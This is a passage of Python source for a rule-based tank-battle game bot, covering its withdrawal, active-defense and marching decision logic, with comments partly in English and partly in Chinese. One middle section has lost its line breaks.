        player = self._player
        Tank2Player = type(player)
        oppPlayer = Tank2Player(oppBattler)

        realAction = player.try_make_decision(action)
        if (Action.is_stay(realAction)
            and player.has_status_in_previous_turns(Status.PREVENT_BEING_KILLED, turns=2) and
            player.has_status_in_previous_turns(Status.WAIT_FOR_WITHDRAWING, turns=2) and
            not Action.is_shoot(oppPlayer.get_previous_action(back=1)) and
            not Action.is_shoot(oppPlayer.get_previous_action(back=2))
            ): # after waiting two turns during which the opponent did NOT shoot, treat it as safe
            # (NOTE: the original comment claimed "both turns were shots", which
            # contradicts the `not is_shoot` conditions above.)
            player.set_status(Status.FORCED_WITHDRAW) # bad design! if this is revised later, the status must be removed again
            realAction = action

        if (Action.is_stay(realAction)
            and not player.has_status(Status.FORCED_WITHDRAW)
            ):
            return Action.STAY

        if self._is_dangerous_action(realAction, oppBattler):
            player.remove_status(Status.FORCED_WITHDRAW)
            return Action.STAY

        return realAction

    def _get_next_action_to_guard_point(self, x2, y2, oppBattler):
        """
        Return the next action that approaches the guard point (x2, y2).

        Falls back to STAY when the candidate action is judged unsafe or would
        take us away from the immediate vicinity of our base.
        """
        player = self._player
        battler = player.battler
        map_ = player._map
        base = map_.bases[battler.side]

        route = battler.get_route_to_point_by_move(x2, y2)
        assert not route.is_not_found() # a route to the guard point must always exist!

        action = battler.get_next_defensive_action(route)
        realAction = self._try_make_decision(action, oppBattler)
        if not Action.is_stay(realAction):
            with map_.simulate_one_action(battler, realAction):
                if not battler.is_closest_to(base):
                    # moving would leave the base's immediate vicinity -- stay instead
                    player.remove_status(Status.FORCED_WITHDRAW)
                    return Action.STAY # presumably this keeps us pinned near the base?
        return realAction # stay/realAction

    def _make_decision(self):

        if not self.__class__.ALLOW_WITHDRAWAL:
            return self.__class__.UNHANDLED_RESULT

        player = self._player
        signal = self._signal
        map_ = player._map
        battler = player.battler
        base = map_.bases[battler.side]
        x2, y2 = base.xy

        Tank2Player = type(player)
        BattleTank = type(battler)

        oppTank = battler.get_nearest_enemy()
        oppBattler = BattleTank(oppTank)
        oppPlayer = Tank2Player(oppBattler)

        status = evaluate_aggressive(battler, oppBattler, allow_withdraw=self.__class__.ALLOW_WITHDRAWAL)

        #
        # First, for a player carrying the persistent WITHDRAW label, check whether
        # the label genuinely needs to be carried on this turn.
        #
        # One situation to consider is whether we should drop it:
        #
        if (player.has_label(Label.KEEP_ON_WITHDRAWING)
            and status != Status.WITHDRAW # the fresh evaluation is not WITHDRAW
            ):
            strictStatus = evaluate_aggressive(battler, oppBattler, strict=True)
            if strictStatus == Status.AGGRESSIVE: # if the opponent was killed last turn, we will most likely switch to aggressive mode?
                player.remove_status(Status.WITHDRAW)
                player.remove_labels(Label.KEEP_ON_WITHDRAWING)
                player.set_status(status)
                return # leave it to other decisions

        #
        # Another situation: did we kill an enemy last turn?
        #
        if len([ _oppPlayer for _oppPlayer in player.opponents if _oppPlayer.defeated ]) == 1:
            teammate = player.teammate
            if not teammate.defeated:
                # A two-on-one situation; oppBattler is the single remaining enemy
                teammateBattler = teammate.battler
                _dontWithdraw = False
                _deltaDistanceToEnemy = battler.get_manhattan_distance_to(oppBattler) - teammateBattler.get_manhattan_distance_to(oppBattler)
                if _deltaDistanceToEnemy > 0: # I am farther from the enemy than my teammate
                    _dontWithdraw = True
                elif _deltaDistanceToEnemy == 0: # equally far
                    _deltaDistanceToOurBase = battler.get_manhattan_distance_to(base) - teammateBattler.get_manhattan_distance_to(base)
                    if _deltaDistanceToOurBase > 0: # I am farther from our base, so let the teammate defend
                        _dontWithdraw = True
                    elif _deltaDistanceToOurBase == 0: # still equally far ...
if not teammate.has_label(Label.DONT_WITHDRAW): # 避免两者同时强攻,那么就让先判断的队友进行强攻 _dontWithdraw = True if _dontWithdraw: player.remove_status(Status.WITHDRAW) player.remove_labels(Label.KEEP_ON_WITHDRAWING) player.add_labels(Label.DONT_WITHDRAW) return # 留给其他 decision 处理 if status == Status.WITHDRAW or player.has_status(Status.WITHDRAW): player.remove_labels(Status.AGGRESSIVE, Status.DEFENSIVE, Status.STALEMENT) player.set_status(Status.WITHDRAW) player.add_labels(Label.KEEP_ON_WITHDRAWING) # 这个状态一旦出现,就添加标记 # # (inserted) 不要轻易从中线撤退,应该想一下是否可以堵路 # if battler.is_near_midline(offset=2): # y = [2, 6] for action in [ Action.STAY ] + battler.get_all_valid_move_actions(): # 先判断 stay with map_.simulate_one_action(battler, action): if battler.can_block_this_enemy(oppBattler): player.set_status(Status.READY_TO_BLOCK_ROAD) return action # 不需要判断安全性? # # 1. 如果上回合已经到达基地附近,那么优先移动到基地对角线的位置等待 # 2. 必要时改变守卫的位置 # # TODO: # 如果能直接到达守卫点,那应该考虑一下直接到达 ... 而不要先把基地的墙凿了 # if battler.is_closest_to(base): player.set_status(Status.GRARD_OUR_BASE) moreDangerousPoint = None _shouldMoveToDangerousPoint = False # # 已到达基地附近,但是未到达守卫点,尝试移向守卫点 # if (battler.xy not in self._GUARD_POINTS # 为处在对角线防御位置 and not player.has_status(Status.BLOCK_ROAD_FOR_OUR_BASE) # 高优先级触发 ): moreDangerousPoint = self._get_more_dangerous_guard_point(oppBattler) _shouldMoveToDangerousPoint = True # # 已经到达守卫点,判断是否需要移向另一个守卫点 # if battler.xy in self._GUARD_POINTS: distancesToEnemy = [ oppBattler.get_manhattan_distance_to_point(x2, y2) for (x2, y2) in self._GUARD_POINTS ] moreDangerousPoint = self._GUARD_POINTS[ np.argmin(distancesToEnemy) ] # 距离敌人更近的点根据危险性 _shouldMoveToDangerousPoint = True if _shouldMoveToDangerousPoint: action = self._get_next_action_to_guard_point(*moreDangerousPoint, oppBattler) if not Action.is_stay(action): player.set_status(Status.MOVE_TO_ANOTHER_GUARD_POINT) else: player.set_status(Status.STAY_FOR_GUARDING_OUR_BASE) return action player.set_status(Status.STAY_FOR_GUARDING_OUR_BASE) # 设置为等待 return Action.STAY # 
其他情况下继续等待 _route1 = battler.get_shortest_defensive_route() _route2 = oppBattler.get_shortest_attacking_route() # 如果不将我视为钢墙 _route3 = oppBattler.get_shortest_attacking_route( ignore_enemies=False, bypass_enemies=True) # 如果将我视为钢墙 # TODO: # 如果 route2 和 route3 距离差很大,那么可以选择不动 # if _route2.is_not_found() or _route3.is_not_found(): # 对方找不到进攻路线,那就相当于我方把路堵住了? return Action.STAY assert not _route1.is_not_found() # 这个不可能的吧 allowedDelay = _route2.length - (_route1.length - 2) # 我方防御路线比地方进攻路线领先值 allowedDelay -= 1 # 至少要快一步 if allowedDelay < 0: allowedDelay = 0 returnAction = Action.INVALID with outer_label() as OUTER_BREAK: for route in sorted( battler.get_all_shortest_defensive_routes(delay=allowedDelay), key=lambda route: estimate_route_blocking(route) ): # 阻塞程度最小的优先 action = battler.get_next_defensive_action(route) if Action.is_stay(action) and battler.is_closest_to(base): # 到达基地就等待了 returnAction = action raise OUTER_BREAK realAction = self._try_make_decision(action, oppBattler) if Action.is_stay(realAction): # 尽量找一条不是停留的路? player.remove_status(Status.FORCED_WITHDRAW) continue returnAction = realAction raise OUTER_BREAK if not Action.is_valid(returnAction): # 没有一个合适的行为? action = battler.get_next_defensive_action(_route1) # 那就随便来一个把 ... returnAction = self._try_make_decision(action, oppBattler) if Action.is_move(returnAction) or Action.is_shoot(returnAction): player.set_status(Status.READY_TO_WITHDRAW) else: # stay if battler.is_closest_to(base): player.set_status(Status.STAY_FOR_GUARDING_OUR_BASE) else: if player.get_risky_enemy() is not None: # 存在风险敌人就能判定是因为敌人阻挡? player.set_status(Status.WAIT_FOR_WITHDRAWING) player.set_status(Status.PREVENT_BEING_KILLED) return returnAction #{ END 'decision/single/withdrawal.py' }# #{ BEGIN 'decision/single/active_defense.py' }# class ActiveDefenseDecision(SingleDecisionMaker): """ 主动防御策略 ----------------------- 不要追击敌人,而是选择保守堵路策略! 1. 对于路线差为 2 的情况,选择堵路,而非重叠 2. 
如果自己正常行军将会射击,那么判断射击所摧毁的块是否为敌人进攻路线上的块 如果是,则改为移动或者停止 """ ACTIVE_DEFENSE_MIN_TRIGGER_TURNS = 2 # 前两回合结束前不要触发主动防御! def _make_decision(self): player = self._player signal = self._signal map_ = player._map tank = player.tank battler = player.battler Tank2Player = type(player) BattleTank = type(battler) oppTank = battler.get_nearest_enemy() # 从路线距离分析确定最近敌人 oppBattler = BattleTank(oppTank) oppPlayer = Tank2Player(oppBattler) _allowWithdraw = ( WithdrawalDecision.ALLOW_WITHDRAWAL and not player.has_label(Label.DONT_WITHDRAW) ) status = evaluate_aggressive(battler, oppBattler, allow_withdraw=_allowWithdraw) player.set_status(status) if status == Status.DEFENSIVE: # 避免过早进入 DEFENSIVE 状态 #---------------------------- currentTurn = map_.turn if currentTurn < __class__.ACTIVE_DEFENSE_MIN_TRIGGER_TURNS and False: # 取消主动防御轮数限制? player.remove_status(Status.DEFENSIVE) player.set_status(Status.AGGRESSIVE) # 前期以侵略性为主 else: # 如果是距离为 2 #---------------- # 由于两者相对的情况在前面的 encount enemy 时会被处理,这里如果遇到这种情况 # 那么说明两者是出于不相对的对角线位置。 # _route = battler.get_route_to_enemy_by_move(oppBattler) if _route.is_not_found(): _route = battler.get_route_to_enemy_by_move(oppBattler, block_teammate=False) assert not _route.is_not_found(), "route not found ?" # 必定能找到路! 
assert _route.length > 0, "unexpected overlapping enemy" if _route.length == 2: # # 此时应该考虑自己是否正处在敌方的进攻的必经之路上 # 如果是这样,那么考虑不动,这样最保守 # 否则在合适的回合冲上去挡路 # # 判定方法是将己方坦克分别视为空白和钢墙,看对方的最短路线长度是否有明显延长 # 如果有,那么就堵路 # # 需要能够正确应对这一局的情况 5cd356e5a51e681f0e921453 # TODO: # 事实上这一局敌方不管往左还是往右,都是8步,因此这里会判定为不堵路,所以就会主动重叠 # 但是,左右两边的走法是不一样的,往左走必定会走不通,左右的8步并不等价,这里需要还需要 # 进一步的分析路线的可走性 # # TODO: # 事实上这样不一定准确,因为如果敌人前面有一个土墙,那么他可以先打掉土墙 # 然后继续前移,这样敌方就可以选择继续往前移动 # enemyAttackRoute1 = oppBattler.get_shortest_attacking_route(ignore_enemies=True, bypass_enemies=False) enemyAttackRoute2 = oppBattler.get_shortest_attacking_route(ignore_enemies=False, bypass_enemies=True) if enemyAttackRoute2.length > enemyAttackRoute1.length: # 路线增长,说明是必经之路 player.set_status(Status.ACTIVE_DEFENSIVE) player.set_status(Status.READY_TO_BLOCK_ROAD) return Action.STAY # # 虽然路线长度相同,但是路线的可走性不一定相同,这里先衡量对方当前路线的可走性 # 如果本回合我方等待,敌人向前移动,那么敌方只有在能够不向原来位置闪避的情况下 # 才算是我堵不住他的路,否则仍然视为堵路成功 5cd356e5a51e681f0e921453 # x0, y0 = oppBattler.xy # 保存原始坐标 enemyMoveAction = oppBattler.get_next_attacking_action(enemyAttackRoute1) # ssert Action.is_move(enemyMoveAction) # 应该是移动 _shouldStay = False with map_.simulate_one_action(oppBattler, enemyMoveAction): if battler.get_manhattan_distance_to(oppBattler) == 1: # 此时敌方与我相邻 _shouldStay = True # 这种情况才是真正的设为 True 否则不属于此处应当考虑的情况 for enemyDodgeAction in oppBattler.try_dodge(battler): with map_.simulate_one_action(oppBattler, enemyDodgeAction): if oppBattler.xy != (x0, y0): # 如果敌人移动后可以不向着原来的位置闪避 _shouldStay = False # 此时相当于不能堵路 break if _shouldStay: player.set_status(Status.ACTIVE_DEFENSIVE) player.set_status(Status.READY_TO_BLOCK_ROAD) return Action.STAY # # 否则自己不处在敌方的必经之路上,考虑主动堵路 # if (not oppBattler.canShoot # 对方这回合不能射击 or (Action.is_stay(oppPlayer.get_previous_action(back=1)) and Action.is_stay(oppPlayer.get_previous_action(back=2)) ) # 或者对方等待了两个回合,视为没有危险 ): # 不宜只考虑一回合,否则可能会出现这种预判错误的情况 5cdd894dd2337e01c79e9bed for moveAction in battler.get_all_valid_move_actions(): with map_.simulate_one_action(battler, 
moveAction): if battler.xy in enemyAttackRoute1: # 移动后我方坦克位于敌方坦克进攻路线上 player.set_status(Status.READY_TO_BLOCK_ROAD) player.set_status(Status.ACTIVE_DEFENSIVE) return moveAction # 我方的移动后仍然不会挡敌人的路?? for moveAction in battler.get_all_valid_move_actions(middle_first=True): # 中路优先 with map_.simulate_one_action(battler, moveAction): if battler.get_manhattan_distance_to(oppBattler) == 1: # 如果移动后与敌人相邻 player.set_status(Status.READY_TO_BLOCK_ROAD) player.set_status(Status.ACTIVE_DEFENSIVE) return moveAction # 否则,就是和敌人接近的连个方向上均为不可走的! # 那么让后续的逻辑进行处理 pass ''' if ( # 可能是主动防御但是为了防止重叠而等待 ( player.has_status_in_previous_turns(Status.ACTIVE_DEFENSIVE, turns=1) and player.has_status_in_previous_turns(Status.READY_TO_BLOCK_ROAD, turns=1) and Action.is_stay(player.get_previous_action(back=1)) ) or # 可能是为了防止被杀而停止 ( player.has_status_in_previous_turns(Status.PREVENT_BEING_KILLED) and Action.is_stay(player.get_previous_action(back=1)) ) ): oppPlayer = Tank2Player(oppBattler) if Action.is_stay(oppPlayer.get_previous_action(back=1)): # 对方上回合在等待 # # 但是遇到这种情况就非常尴尬 5cd356e5a51e681f0e921453 # # 需要再判断一下是否有必要上前堵路 # _shouldMove = False x1, y1 = oppBattler.xy x2, y2 = _route[1].xy # 目标位置 enemyAttackRoute = oppBattler.get_shortest_attacking_route() if (x2, y2) in enemyAttackRoute: # 下一步移动为进攻路线 enemyMoveAction = Action.get_move_action(x1, y1, x2, y2) with map_.simulate_one_action(oppBattler, enemyMoveAction): for enemyDodgeAction in oppBattler.try_dodge(battler): # 如果敌人上前后可以闪避我 route1 = oppBattler.get_shortest_attacking_route() with map_.simulate_one_action(oppBattler, enemyDodgeAction): route2 = oppBattler.get_shortest_attacking_route() if route2.length <= route1.length: # 并且闪避的路线不是原路返回 _shouldMove = True break # # 真正的值得堵路的情况 # if _shouldMove: x1, y1 = battler.xy x2, y2 = _route[1].xy # 跳过开头 moveAction = Action.get_move_action(x1, y1, x2, y2) if map_.is_valid_move_action(battler, moveAction): # 稍微检查一下,应该本来是不会有错的 player.set_status(Status.ACTIVE_DEFENSIVE) 
player.set_status(Status.READY_TO_BLOCK_ROAD) return moveAction # # 否则选择不要上前和敌人重叠,而是堵路 # player.set_status(Status.ACTIVE_DEFENSIVE) player.set_status(Status.READY_TO_BLOCK_ROAD) return Action.STAY''' # endif # 转向寻找和敌方进攻路线相似度更高的路线 #-------------------------------------- # enemyAttackRoute = oppBattler.get_shortest_attacking_route() closestAttackRoute = max( battler.get_all_shortest_attacking_routes(delay=3), # 允许 3 步延迟 key=lambda r: estimate_route_similarity(r, enemyAttackRoute) ) # 相似度最大的路线 # # 判断下一步是否可以出现在敌人的攻击路径之上 5cd31d84a51e681f0e91ca2c #------------------------------- # 如果可以,就移动过去 # for moveAction in battler.get_all_valid_move_actions(): with map_.simulate_one_action(battler, moveAction): x3, y3 = battler.xy # 获得移动后的坐标 if (x3, y3) in enemyAttackRoute: _willMove = False # 是否符合移动的条件 realAction = player.try_make_decision(moveAction) if Action.is_move(realAction): _willMove = True elif player.has_status_in_previous_turns(Status.PREVENT_BEING_KILLED, turns=1): # 打破僵局 oppBattler = player.get_risky_enemy() oppPlayer = Tank2Player(oppBattler) if (oppBattler.canShoot # 当回合可以射击 and not oppPlayer.has_status_in_previous_turns(Status.RELOADING) # 上回合也可以射击 ): # 说明敌人大概率不打算攻击我 _willMove = True # # 符合了移动的条件 # 但是还需要检查移动方向 # 不能向着远离敌人的方向移动,不然就会后退 ... 
5cd33351a51e681f0e91da39 # if _willMove: distance1 = battler.get_manhattan_distance_to(oppBattler) with map_.simulate_one_action(battler, moveAction): distance2 = battler.get_manhattan_distance_to(oppBattler) if distance2 > distance1: # 向着远处移动了 pass else: # 添加一个限制,必须要移动后出现在敌人的附近 # 否则约束过弱,容易导致前期乱跑的情况 5cd39434a51e681f0e924128 # for enemy in oppBattler.get_enemies_around(): if enemy is tank: player.set_status(Status.ACTIVE_DEFENSIVE) player.set_status(Status.READY_TO_BLOCK_ROAD) return moveAction attackAction = battler.get_next_attacking_action(closestAttackRoute) realAction = player.try_make_decision(attackAction) # # 判断自己的下一步是否为敌人开路 #------------------------- # 如果自己下一个行为是射击,然后所射掉的块为敌人进攻路线上的块 # 那么将这个动作转为移动或者停止 # # TODO: # 这个动作是有条件的,通常认为是,块就处在敌人的周围,我将块打破后 # 敌人有炮,我不能马上移到块的,这样就可能让敌人过掉,在这种情况下避免开炮 # # TODO: # 不能被过掉的情况不准确!只有不再在同一直线的情况下才需要判断 5ce444a8d2337e01c7a5eaea # 如果两者处在同一条直线,假如双方都射击,那么下一回合就直接相遇,并不会出现被对方过掉的情况 # if (not battler.on_the_same_line_with(oppBattler) and Action.is_shoot(realAction) and battler.will_destroy_a_brick_if_shoot(realAction) # 下一步将会打掉一个墙 ): field = battler.get_destroyed_fields_if_shoot(realAction)[0] enemyAttackRoute = oppBattler.get_shortest_attacking_route() if enemyAttackRoute.has_block(field): # 打掉的 Brick 在敌人进攻路线上 # # 再尝试模拟,是否会导致上述情况 # _dontShoot = False with outer_label() as OUTER_BREAK: for enemyMoveAction in oppBattler.get_all_valid_actions(): # 一回合假设我方射击,敌人任意行为 with map_.simulate_multi_actions((battler, realAction), (oppBattler, enemyMoveAction)): moveAction = realAction - 4 # 二回合假设我方移动,敌人射击 for enemyShootAction in oppBattler.get_all_valid_shoot_actions(): # 自动判断是否可射击 with map_.simulate_multi_actions((battler, moveAction), (oppBattler, enemyShootAction)): if battler.destroyed: # 然后这回合我方坦克挂了 _dontShoot = True raise OUTER_BREAK if _dontShoot: player.set_status(Status.ACTIVE_DEFENSIVE) return player.try_make_decision(moveAction) # 移动/停止 # 否则直接采用主动防御的进攻策略 # # TODO: # 这是个糟糕的设计,因为这相当于要和下方的进攻代码重复一遍 # if battler.is_in_our_site(): # 只有在我方地盘的时候才触发 # # 
首先实现禁止随便破墙 # if Action.is_shoot(realAction): # # 敌人处在墙后的水平路线上,并且与墙的间隔不超过 1 个空格 5cd33a06a51e681f0e91de95 # 事实上 1 个空格是不够的! 5cd35e08a51e681f0e92182e # enemy = battler.get_enemy_behind_brick(realAction, interval=-1) if enemy is not None: player.set_status(Status.HAS_ENEMY_BEHIND_BRICK) player.set_status(Status.ACTIVE_DEFENSIVE) return Action.STAY # # 敌人下一步可能移到墙后面 # for moveAction in oppBattler.get_all_valid_move_actions(): with map_.simulate_one_action(oppBattler, moveAction): if battler.get_enemy_behind_brick(realAction, interval=-1) is not None: # 此时如果直接出现在墙的后面 player.set_status(Status.ACTIVE_DEFENSIVE) return Action.STAY if Action.is_stay(realAction): # (inserted) 主动打破僵局:因为遇到敌人,为了防止被射杀而停留 # 注: # 这段代码复制自下方的侵略模式 #-------------------------- if Action.is_move(attackAction): if player.has_status_in_previous_turns(Status.PREVENT_BEING_KILLED, turns=1): # 即将停留第二回合 oppPlayer = Tank2Player(oppBattler) if (Action.is_move(oppPlayer.get_previous_action(back=1)) and battler.get_manhattan_distance_to(oppBattler) == 2 ): # 这种情况对应着对方刚刚到达拐角处,这种情况是有危险性的,因此再停留一回合 5cd4045c86d50d05a00840e1 pass elif oppBattler.canShoot: # 当回合可以射击,并且我上回合停留,因此敌人上回合可以射击 # 说明敌人大概率不打算攻击我 player.set_status(Status.ACTIVE_DEFENSIVE) return attackAction player.set_status(Status.PREVENT_BEING_KILLED) # 否则标记为防止被杀,用于上面的触发 player.set_status(Status.ACTIVE_DEFENSIVE) return realAction #{ END 'decision/single/active_defense.py' }# #{ BEGIN 'decision/single/marching.py' }# class MarchingDecision(SingleDecisionMaker): """ 行军策略 ------------------------- 当身边没有和任何敌人正面遭遇的时候,尝试寻找最佳的进攻行为 1. 进攻 2. 不会主动破墙 3. 遇到僵局,会在指定回合后自动打破僵局 4. 遇到有风险的路径导致需要停止不前的,会考虑寻找相同长度但是安全的路径,并改变方向 5. ...... 
    """
    def _make_decision(self):

        player  = self._player
        signal  = self._signal
        map_    = player._map
        tank    = player.tank
        battler = player.battler

        teammate = player.teammate

        Tank2Player = type(player)
        BattleTank  = type(battler)

        # (inserted) Forced-march signal from the team layer: keep attacking
        # regardless of the usual safety checks.
        #-------------------------
        if signal == Signal.FORCED_MARCH:
            attackAction = battler.get_next_attacking_action()  # expected to be a move; safety deliberately not checked
            player.set_status(Status.READY_TO_FORCED_MARCH)
            return ( attackAction, Signal.READY_TO_FORCED_MARCH )

        oppTank = battler.get_nearest_enemy()
        oppBattler = BattleTank(oppTank)
        oppPlayer = Tank2Player(oppBattler)

        myRoute = battler.get_shortest_attacking_route()
        oppRoute = oppBattler.get_shortest_attacking_route()
        # assert not myRoute.is_not_found() and not oppRoute.is_not_found(), "route not found"
        if myRoute.is_not_found() or oppRoute.is_not_found():
            # Very special case: a teammate may completely block the way!  5cdde41fd2337e01c79f1284
            allowedDelay = 0
        else:
            leadingLength = oppRoute.length - myRoute.length

            if leadingLength <= 0:
                allowedDelay = 0  # not in the lead, so no delay is affordable
            else:
                # Arriving simultaneously is acceptable: our side acts first,
                # so we are effectively still ahead.
                allowedDelay = leadingLength

        # Route-search preference.
        # Middle-first on the enemy half ( 5cde18e7d2337e01c79f47c8 ) was tried but
        # tends to open a narrow corridor and then stall in front of a threatening
        # enemy ( 5ce48c2fd2337e01c7a6459b ), so both flags default to False.
        isMiddleFirst = False
        # isMiddleFirst = battler.is_in_enemy_site()
        isXAxisFirst = False

        # If both our tanks and both enemies sit on the enemy half (midline
        # included) and nobody has an adjacent enemy — i.e. everyone is all-in on
        # demolishing ( 5cec9157641dd10fdcc5f30d ) — switch to middle-first +
        # x-axis-first search, which prefers tearing down the x = 4 wall and
        # triggers cooperation better.
        _allPlayers = [ player, teammate, *player.opponents ]
        if (all( _player.battler.is_in_enemy_site(include_midline=True) for _player in _allPlayers )
            and all( not _player.battler.has_enemy_around() for _player in _allPlayers )
            ):
            isMiddleFirst = True  # x-axis-first requires middle-first
            isXAxisFirst = True

        if battler.is_in_our_site():
            # On our own half, do NOT weight routes by enemy interference and keep
            # the flank-first search order: bumping into the enemy is at worst a
            # draw, whereas weighting could make us pick the middle while the enemy
            # flanks (one enemy pinning both of us) or take a longer "safe" route
            # and lose the race outright.
            # TODO: this strongly affects aggressiveness — flank splits rarely
            #       trigger cooperative demolishing. Maybe special-case the
            #       one-pins-two situation and keep detouring otherwise?
            routes = battler.get_all_shortest_attacking_routes(delay=allowedDelay, middle_first=isMiddleFirst, x_axis_first=isXAxisFirst)
        else:
            routes = sorted( battler.get_all_shortest_attacking_routes(delay=allowedDelay, middle_first=isMiddleFirst, x_axis_first=isXAxisFirst),
                             key=lambda r: estimate_enemy_effect_on_route(r, player) )

        route = None                # attacking route chosen this turn
        returnAction = Action.STAY  # action to be returned; STAY by default

        # Cache of the optimal (first) route's decision, used to judge whether a
        # later, sub-optimal choice is actually reasonable — constantly turning
        # back is silly!  5cee6790641dd10fdcc8de2c
        _firstAttackAction = None         # attack action suggested by the first route
        _firstRealAction = None           # player's vetted decision for the first route
        _firstPreventBeingKilled = False  # whether the first action stalled due to enemy interception
        _firstStatus = None               # statuses captured during the first decision
        _isFirstRoute = False             # whether the current iteration handles the first route
        _firstRoute = None                # the first route itself

        with outer_label() as OUTER_BREAK:
            # TODO: route length and enemy influence are combined only here; every
            #       other helper deriving a next attack action should ideally use
            #       the same weighting.
            _cachedAttackActions = set()  # attack actions already examined

            for _idx, route in enumerate(routes):  # _idx tells which route this is
                # First clear statuses a previous iteration may have set (the ones
                # that lead to STAY).

                _isFirstRoute = ( _idx == 0 )

                if _idx == 1:  # just moved past the first route
                    _firstStatus = player.get_status().copy()  # capture statuses any 'continue' below may have set

                player.remove_status(Status.WAIT_FOR_MARCHING,
                                     Status.PREVENT_BEING_KILLED,
                                     Status.HAS_ENEMY_BEHIND_BRICK)

                attackAction = battler.get_next_attacking_action(route)

                if _isFirstRoute:  # cache action and route
                    _firstAttackAction = attackAction
                    _firstRoute = route

                if attackAction in _cachedAttackActions:  # skip duplicate attack actions
                    continue
                _cachedAttackActions.add(attackAction)

                if Action.is_stay(attackAction):  # a stay needs no further analysis
                    returnAction = attackAction
                    raise OUTER_BREAK

                realAction = player.try_make_decision(attackAction)
                if _isFirstRoute:  # cache the vetted decision
                    _firstRealAction = realAction

                # debug_print(player, attackAction, realAction)

                if Action.is_stay(realAction):  # the attack action is risky
                    if Action.is_move(attackAction):

                        # Special case: about to shoot down the enemy base within
                        # two turns — no point in wandering off.  5cddde4dd2337e01c79f0ba3
                        if battler.is_face_to_enemy_base():
                            returnAction = realAction
                            raise OUTER_BREAK

                        # (inserted) Proactively break the "stop to avoid being
                        # shot" deadlock. NOTE: a nearly identical block exists in
                        # the active-defense decision above.
                        #--------------------------
                        if (player.has_status_in_previous_turns(Status.WAIT_FOR_MARCHING, turns=1)
                            and player.has_status_in_previous_turns(Status.PREVENT_BEING_KILLED, turns=1)
                            ):  # about to stall for the second turn
                            riskyBattler = player.get_risky_enemy()
                            riskyPlayer = Tank2Player(riskyBattler)
                            # Criteria for "the enemy will not attack me":
                            #   1. it can shoot this turn,
                            #   2. it could also shoot last turn,
                            #   3. its last two actions were identical (it kept
                            #      moving or kept waiting) — an important extra
                            #      condition  5cde71a4d2337e01c79f9a77
                            # TODO: the condition is still not right!  5ce220add2337e01c7a38462
                            if (riskyBattler.canShoot  # can shoot this turn
                                and not riskyPlayer.has_status_in_previous_turns(Status.RELOADING)  # could shoot last turn too
                                and riskyPlayer.get_previous_action(back=1) == riskyPlayer.get_previous_action(back=2)
                                ):  # the enemy most likely does not intend to attack me
                                if (Action.is_move(riskyPlayer.get_previous_action(back=1))
                                    and battler.get_manhattan_distance_to(riskyBattler) == 2
                                    ):
                                    # The enemy just reached a corner, which is
                                    # dangerous — stall one more turn.  5cd4045c86d50d05a00840e1
                                    player.set_status(Status.WAIT_FOR_MARCHING)
                                    player.set_status(Status.PREVENT_BEING_KILLED)
                                    pass
                                else:
                                    # TODO: should we pre-break a wall here?  5ce21ba2d2337e01c7a37dbd
                                    player.set_status(Status.KEEP_ON_MARCHING)
                                    returnAction = attackAction
                                    raise OUTER_BREAK

                        # The intended move has become a stay. Staying wastes
                        # time — attack instead.
                        #------------------------
                        fields = battler.get_destroyed_fields_if_shoot(attackAction)

                        # If shooting this turn destroys a block lying on our own
                        # shortest route, shoot.
                        for field in fields:
                            if route.has_block(field):  # a route block destroyable this turn
                                action = player.try_make_decision(battler.shoot_to(field))
                                if Action.is_shoot(action):
                                    # These statuses reflect the real situation and
                                    # can trigger the team break-brick signal.
                                    player.set_status(Status.WAIT_FOR_MARCHING)
                                    player.set_status(Status.PREVENT_BEING_KILLED)
                                    returnAction = action
                                    raise OUTER_BREAK

                        # If the destroyable block is the enemy base's outer wall,
                        # still attack — the demolition may unlock a shorter route.
                        for field in fields:
                            if battler.check_is_outer_wall_of_enemy_base(field):
                                action = player.try_make_decision(battler.shoot_to(field))
                                if Action.is_shoot(action):
                                    player.set_status(Status.WAIT_FOR_MARCHING)
                                    player.set_status(Status.PREVENT_BEING_KILLED)
                                    returnAction = action
                                    raise OUTER_BREAK

                        # If we can destroy a brick two cells ahead (one gap between
                        # us), pre-break it: when we later push forward under fire, a
                        # free cell ahead lets us dodge forward instead of retreating
                        # the way we came, avoiding a stalemate.
                        # Never break walls casually while defensive!  5cd31d84a51e681f0e91ca2c
                        if (not player.has_status(Status.DEFENSIVE)  # not in defensive mode
                            and battler.is_in_enemy_site()           # only effective inside the enemy half
                            ):
                            for field in fields:
                                if (isinstance(field, BrickField)
                                    and battler.get_manhattan_distance_to(field) == 2  # distance 2 = one gap to the brick
                                    and battler.canShoot
                                    ):
                                    # These statuses reflect the real situation and
                                    # can trigger the team break-brick signal.
                                    player.set_status(Status.WAIT_FOR_MARCHING)
                                    player.set_status(Status.PREVENT_BEING_KILLED)
                                    player.set_status(Status.READY_TO_CLEAR_A_ROAD_FIRST)
                                    returnAction = battler.shoot_to(field)
                                    raise OUTER_BREAK

                    elif Action.is_shoot(attackAction):
                        # A shoot action stalled — check whether an enemy behind the
                        # brick caused it.
                        enemy = battler.get_enemy_behind_brick(attackAction, interval=-1)
                        if enemy is not None:
                            player.set_risky_enemy(enemy)  # explicitly record the culprit
                            player.set_status(Status.HAS_ENEMY_BEHIND_BRICK)

                        # Forced-attack case: both sides are demolishing and the
                        # enemy might step behind our tank next turn. Chasing a kill
                        # while attacking usually loses tempo, so assume the enemy
                        # will not come for us and keep attacking.  5ce57074d2337e01c7a7b128
                        oppBattler = player.get_risky_enemy()
                        if (battler.is_in_enemy_site()       # only when both tanks are
                            and oppBattler.is_in_enemy_site()  # inside the enemy half
                            ):
                            # Check whether the enemy can find a shortest attacking
                            # route unaffected by our tank (usually it can).
                            # NOTE(review): the loop variable 'route' is never used
                            # inside the body and get_next_attacking_action() is
                            # called without it — confirm whether the route should
                            # be passed in.
                            _consideredActions = set()  # actions already examined
                            for route in oppBattler.get_all_shortest_attacking_routes():
                                _action = oppBattler.get_next_attacking_action()
                                if _action in _consideredActions:
                                    continue
                                _consideredActions.add(_action)
                                with map_.simulate_one_action(oppBattler, _action):
                                    if not battler.has_enemy_around():
                                        # Found a route that dodges our tank.
                                        player.set_status(Status.KEEP_ON_MARCHING)
                                        returnAction = attackAction
                                        raise OUTER_BREAK

                    # Otherwise halt. A risky enemy necessarily exists at this point.
                    player.set_status(Status.WAIT_FOR_MARCHING)    # may trigger Signal.PREPARE_FOR_BREAK_BRICK and Signal.FORCED_MARCH
                    player.set_status(Status.PREVENT_BEING_KILLED) # TODO: this status is generic; ideally every case above sets it too
                    if _isFirstRoute:
                        _firstPreventBeingKilled = True  # cache only for stay-to-avoid-death stalls, not other cases
